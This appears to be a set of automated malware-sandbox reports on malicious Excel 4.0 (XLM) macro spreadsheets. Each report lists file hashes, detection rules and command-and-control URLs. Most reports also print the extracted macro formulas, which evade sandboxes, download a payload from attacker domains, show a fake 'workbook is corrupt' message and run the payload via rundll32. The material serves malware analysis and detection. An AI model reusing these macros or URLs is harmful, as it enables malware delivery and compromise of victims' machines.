{"version":"0.2","sample":{"sample":"","kind":"file","target":"1bd6c30b142125c663dfe22b3c4d6af3fb7546a0de03544028f04070a511d7ad"},"analysis":{"reported":"2020-04-09T16:15:09Z","score":10},"files":[{"filename":"1bd6c30b142125c663dfe22b3c4d6af3fb7546a0de03544028f04070a511d7ad","filesize":206336,"md5":"84233eef86922a61ef6fa21c16ee907d","sha1":"df1f604054ae455ae121a0e967cadd7d4cc2a9b4","sha256":"1bd6c30b142125c663dfe22b3c4d6af3fb7546a0de03544028f04070a511d7ad","sha512":"f2dad48fc069acf0ee2a49e1bf6002014a7e0b47c342a41b43907b71d63de35e3bb1575ad9652288b73e34fdec29813b1de05e80fde9fa992a2345dd57ccea8b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1bd6c30b142125c663dfe22b3c4d6af3fb7546a0de03544028f04070a511d7ad.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2ObTaN0oTa\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1bdf9282f8b56f179baef6c767671fd9f3ecaf29d723e9fd20e30db47b7f0dfb"},"analysis":{"reported":"2020-04-09T16:15:09Z","score":10},"files":[{"filename":"1bdf9282f8b56f179baef6c767671fd9f3ecaf29d723e9fd20e30db47b7f0dfb","filesize":185344,"md5":"8b138b9ca08fe6a92dcc2c1207beaeb9","sha1":"0b27131fd8bbc4a35c01baaae750e51deb1d49e3","sha256":"1bdf9282f8b56f179baef6c767671fd9f3ecaf29d723e9fd20e30db47b7f0dfb","sha512":"83bc9aad3d4f399988d3ea4d0ca9ed79251a721381a49ff2eea5aa4d167d608cfbbd7fcb9dd1d49a9c6ae60d7c1d29e5e167c5653ca5d828ccae8d94d951220d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1bdf9282f8b56f179baef6c767671fd9f3ecaf29d723e9fd20e30db47b7f0dfb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1becc728db071f6458b06455af6dcf0f21c849c5f95fa459f5a76c143deddde3"},"analysis":{"reported":"2020-04-09T16:15:09Z","score":10},"files":[{"filename":"1becc728db071f6458b06455af6dcf0f21c849c5f95fa459f5a76c143deddde3","filesize":185344,"md5":"d9efc55c2200cd30019032cd2537de73","sha1":"0529b473008cae7afa2db2943f67240ffa905a08","sha256":"1becc728db071f6458b06455af6dcf0f21c849c5f95fa459f5a76c143deddde3","sha512":"774c17c3dac0bfe5a4756514af527717eb58a35e2c59941219e0399cb4d2eaf3d301ccfd46d098e6111db2f4734e290dbd26cd61a116d706b1b795ed13e7c2f9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1becc728db071f6458b06455af6dcf0f21c849c5f95fa459f5a76c143deddde3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1bf1b4d28d56da940a6b3c1862fdf15bacce263fd2f01caf25cd64199f45893b"},"analysis":{"reported":"2020-04-09T16:15:09Z","score":10},"files":[{"filename":"1bf1b4d28d56da940a6b3c1862fdf15bacce263fd2f01caf25cd64199f45893b","filesize":167936,"md5":"ebb421333070a70fe63121f2c66b9243","sha1":"49aae99416679a59e0e1f01c5792e7a960e15010","sha256":"1bf1b4d28d56da940a6b3c1862fdf15bacce263fd2f01caf25cd64199f45893b","sha512":"fee5a1db1264b63f71bcbc3a620bf0ec5e5fdcbeab41336a332a88785138362173a565acc61ae10909133d7edbdc626fb2b4376c4c91e04e1ae34f363dbd7f51","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1bf1b4d28d56da940a6b3c1862fdf15bacce263fd2f01caf25cd64199f45893b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"j5M1y6ux3p\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1bf1bb1e50578fceba5123729d81031bc3afc715ab7a0143879bbc772e4c4d52"},"analysis":{"reported":"2020-04-09T16:15:09Z","score":10},"files":[{"filename":"1bf1bb1e50578fceba5123729d81031bc3afc715ab7a0143879bbc772e4c4d52","filesize":209920,"md5":"d263a9d4574a19a3fd04ad12889f90f2","sha1":"1723763b69066183bedf872cc63508b9aedb255c","sha256":"1bf1bb1e50578fceba5123729d81031bc3afc715ab7a0143879bbc772e4c4d52","sha512":"1dedb031de2dece7fd6f280432630f9764a386be647aee731e607e3d0ab1388d27141db3527a5c3a32f18cdada6bb82535590287a8a034cfd70a79fa696848c6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1bf1bb1e50578fceba5123729d81031bc3afc715ab7a0143879bbc772e4c4d52.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"oNjHfBxP09\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1c022c59f3ed2ac052b994e77eba5f772908f666481b27ed1c27df0d5e7471b9"},"analysis":{"reported":"2020-04-09T16:15:10Z","score":10},"files":[{"filename":"1c022c59f3ed2ac052b994e77eba5f772908f666481b27ed1c27df0d5e7471b9","filesize":160768,"md5":"8c25eb69eab6a789520c4f25664c9ca5","sha1":"e9c271cf748e4111aadbc71ffe0d0c130eaa999f","sha256":"1c022c59f3ed2ac052b994e77eba5f772908f666481b27ed1c27df0d5e7471b9","sha512":"bdfd9088de85c4285d64f38fe460aee1e5488aa7a84cc0997a62cd0dff85c866a84775f6a20dfa5c9c0d0d00c7bf914c8175c5e594da0e8c220ba13a0078cc67","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1c022c59f3ed2ac052b994e77eba5f772908f666481b27ed1c27df0d5e7471b9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cWjcQWo001\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1c1622b3f23647f2426c3b7dab69f8ce473779515a919b1d1a4974216f6617e6"},"analysis":{"reported":"2020-04-09T16:15:10Z","score":10},"files":[{"filename":"1c1622b3f23647f2426c3b7dab69f8ce473779515a919b1d1a4974216f6617e6","filesize":167936,"md5":"3afaea909082899239f18854659442ad","sha1":"609e488e8c1b5a28aaac7fd968e498300d22d2a3","sha256":"1c1622b3f23647f2426c3b7dab69f8ce473779515a919b1d1a4974216f6617e6","sha512":"90c2cbdfc8bcdfb8a56fbae2be798d067b1e4488badeeb133da032cfe8591c0865f4dee9c42a92009225f746ca564e31c273f296d7e3e99b4c9da1a43444a0fb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1c1622b3f23647f2426c3b7dab69f8ce473779515a919b1d1a4974216f6617e6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CVFFHYJppe\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1c213447c2c28d16efec1814aacc07ff173fe9b5196bcab91285bf50e8bf66ff"},"analysis":{"reported":"2020-04-09T16:15:10Z","score":10},"files":[{"filename":"1c213447c2c28d16efec1814aacc07ff173fe9b5196bcab91285bf50e8bf66ff","filesize":116224,"md5":"e3400f4fab2d49daac39f980bc04f662","sha1":"7bf77321b185d149b8c0e56c4802d78077d9bf99","sha256":"1c213447c2c28d16efec1814aacc07ff173fe9b5196bcab91285bf50e8bf66ff","sha512":"9423e4f1281cefede3970c26be2e5e938319ac64d944cbfe8f421ccfb9f3e8da11220e34d7d855ac7fe62eb1978bdddc7784436ea9bc80eba8f314af60ef2639","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1c213447c2c28d16efec1814aacc07ff173fe9b5196bcab91285bf50e8bf66ff.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"P5MCxItCuj\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1c3cadbdb6d9f6ddd42dac0e52a8f657e567b6e9edcd01bcce264fe46760aca5"},"analysis":{"reported":"2020-04-09T16:15:10Z","score":10},"files":[{"filename":"1c3cadbdb6d9f6ddd42dac0e52a8f657e567b6e9edcd01bcce264fe46760aca5","filesize":212992,"md5":"072a108d80aa9b71ca4aad2abb84c9c7","sha1":"a4db115abbfd00c1f3a97e30c8abbb5c5bb1045a","sha256":"1c3cadbdb6d9f6ddd42dac0e52a8f657e567b6e9edcd01bcce264fe46760aca5","sha512":"a651d36bcf8f6a8c2a90c4f9ffc0938f0a13fcb5c0d7b9346c95ad8f3583c5d0fa229dda4b3e4a1d3ba9f2dd71b951d7e1ea574540dd85a3716f9ed4e0ab8bb4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1c3cadbdb6d9f6ddd42dac0e52a8f657e567b6e9edcd01bcce264fe46760aca5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"nFH9bnd4EH\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1c40db5402d7a515d80a9f40e61ce5bef137b42567c637094d40e72b55bf67bd"},"analysis":{"reported":"2020-04-09T16:15:10Z","score":10},"files":[{"filename":"1c40db5402d7a515d80a9f40e61ce5bef137b42567c637094d40e72b55bf67bd","filesize":145920,"md5":"a971235d674ef0239e6544075a9ca4be","sha1":"f939d793de1c54ba7520dcce2c49a1dd23a4424a","sha256":"1c40db5402d7a515d80a9f40e61ce5bef137b42567c637094d40e72b55bf67bd","sha512":"09e835bd1ac9fda19b7f51da2fec5a951c89959c45679a01c668f1707c866e385ad3b610c11ad83b39594bd0ce6f97c581f92dbb9fa914f6416de484318836a0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1c40db5402d7a515d80a9f40e61ce5bef137b42567c637094d40e72b55bf67bd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"cle26l5UvI\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1c4bbdfda26b082883243b317068f7d26c85353d1c11189b8ae9c7879a4c1b69"},"analysis":{"reported":"2020-04-09T16:15:10Z","score":10},"files":[{"filename":"1c4bbdfda26b082883243b317068f7d26c85353d1c11189b8ae9c7879a4c1b69","filesize":209408,"md5":"9d66c2cb403a7c2be891ab3b9a2163ce","sha1":"2925780aedbd937e09111d5c2999fca2770562b8","sha256":"1c4bbdfda26b082883243b317068f7d26c85353d1c11189b8ae9c7879a4c1b69","sha512":"3871e387ccc425cd4d643f66b03c85922b18e431d6ce2664078563e7e9d9c9abb73c94d500347446f2545198f7cc29ac131fecc5e9904acc000b10ea43ccc273","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1c4bbdfda26b082883243b317068f7d26c85353d1c11189b8ae9c7879a4c1b69.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"UKhAYIF6BF\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1c567122ffb5679048513f021886c6eab110dcd50d933fe265a15e7bef562797"},"analysis":{"reported":"2020-04-09T16:15:10Z","score":10},"files":[{"filename":"1c567122ffb5679048513f021886c6eab110dcd50d933fe265a15e7bef562797","filesize":206336,"md5":"ab40d53b6f8005f8cbf25db3971b3d87","sha1":"1aa2a42ed803448521ed8a8facb324efe2cf37e1","sha256":"1c567122ffb5679048513f021886c6eab110dcd50d933fe265a15e7bef562797","sha512":"dd1b3a7e7d94acccb8d3c6d3352253d67cbfc7a09d678f599014e0b502f41c8a93d5d23798effb2dd16e0c6f4a98a50e606579a60f7cba02f78537e928fa5c3b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1c567122ffb5679048513f021886c6eab110dcd50d933fe265a15e7bef562797.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IduORdLEMO\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1c6685a57ceee86a2fbd41df5da50741e73943822231cc581ad1c011cac71360"},"analysis":{"reported":"2020-04-09T16:15:10Z","score":10},"files":[{"filename":"1c6685a57ceee86a2fbd41df5da50741e73943822231cc581ad1c011cac71360","filesize":147968,"md5":"addce7b84e203c456ba5f2334de4ea82","sha1":"d4908961930ff454782e63388ffed423321e7f7f","sha256":"1c6685a57ceee86a2fbd41df5da50741e73943822231cc581ad1c011cac71360","sha512":"d26fe7466d6f0959d1ccadfca16dd30b4bf33cd374b706a068829df93f44a4df4525b94dc387328ff06fdb541b790bad1a95fcf2d82d6c983bdff5fa9df49219","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1c6685a57ceee86a2fbd41df5da50741e73943822231cc581ad1c011cac71360.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"v9l32Da6fL\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1c8b86b41d682bf064758928d3460ba7f5c3e61df8bf5feac12cbe1761d66e1e"},"analysis":{"reported":"2020-04-09T16:15:10Z","score":10},"files":[{"filename":"1c8b86b41d682bf064758928d3460ba7f5c3e61df8bf5feac12cbe1761d66e1e","filesize":185344,"md5":"8ddb02729e83b3ee28bcf1b0c6c678f2","sha1":"92f23756ee600f67660740331545e6c87357130a","sha256":"1c8b86b41d682bf064758928d3460ba7f5c3e61df8bf5feac12cbe1761d66e1e","sha512":"22bb75137ae975d6d043eb9a16de03e49df8ef888a523e3131ad37b7b5602d284fb0bb4b0cda83fbaf3c260a644b355627c1467a0ef7a0ad95c6e731168ff78b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1c8b86b41d682bf064758928d3460ba7f5c3e61df8bf5feac12cbe1761d66e1e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1c8e22a989f287b360bc58401eebab48c46c2f1a85a137e23afbf2c217deb139"},"analysis":{"reported":"2020-04-09T16:15:10Z","score":10},"files":[{"filename":"1c8e22a989f287b360bc58401eebab48c46c2f1a85a137e23afbf2c217deb139","filesize":167936,"md5":"ab48b3580f7abbe224e2b596b132634f","sha1":"9673af7a17565ee40472f7289027a352be966ff7","sha256":"1c8e22a989f287b360bc58401eebab48c46c2f1a85a137e23afbf2c217deb139","sha512":"a57224e95aae0538ba5a160eaa3883f2b2cbfe7596a8cb6f17aac0892d511b35dbb1340af5783ddeb4d5ce8d8c893868ef66b310616d0f9dca9cae3b0cad2517","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1c8e22a989f287b360bc58401eebab48c46c2f1a85a137e23afbf2c217deb139.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KNP7cF2eBL\",TRUE)\nGOTO(R$0C$19)"}}}]}
